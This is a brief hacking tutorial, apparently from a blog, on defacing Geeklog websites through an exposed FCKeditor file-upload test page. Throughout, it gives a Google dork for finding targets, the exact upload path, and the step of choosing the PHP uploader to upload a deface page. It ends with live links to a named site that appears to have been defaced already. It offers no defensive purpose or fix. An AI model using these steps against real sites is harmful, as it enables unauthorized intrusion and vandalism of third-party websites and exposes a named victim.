Geeklog Remote Deface Upload Vunerablity

Geeklog Remote Deface Upload Vunerablity

Geeklog Remote Deface Upload  Vunerablity, This Vunerablity is Similar to wordpress fckeditor upload Vunerablity (read about wordpress fckeditor upload Vunerablity ) in Geeklog just the Path Changed,


Lets Start 
open google.com & enter This dork 
inurl:"/geeklog/" 
or 
index of/ geeklog/fckeditor/editor/filemanager/upload/test.html

Now go to site site.com/geeklog/

 Now Put The Url /Geeklog/fckeditor/editor/filemanager/upload/test.html after .com .net or site domain

now the url will be 

site.com/Geeklog/fckeditor/editor/filemanager/upload/test.html

Now select php in 

Select the "File Uploader" to use:               Now Upload Your deface :)  Live Demo http://www.sightline4bd.com/geeklog/ http://www.sightline4bd.com/geeklog/fckeditor/editor/filemanager/upload/test.html http://sightline4bd.com/geeklog/images/libraryHack.htm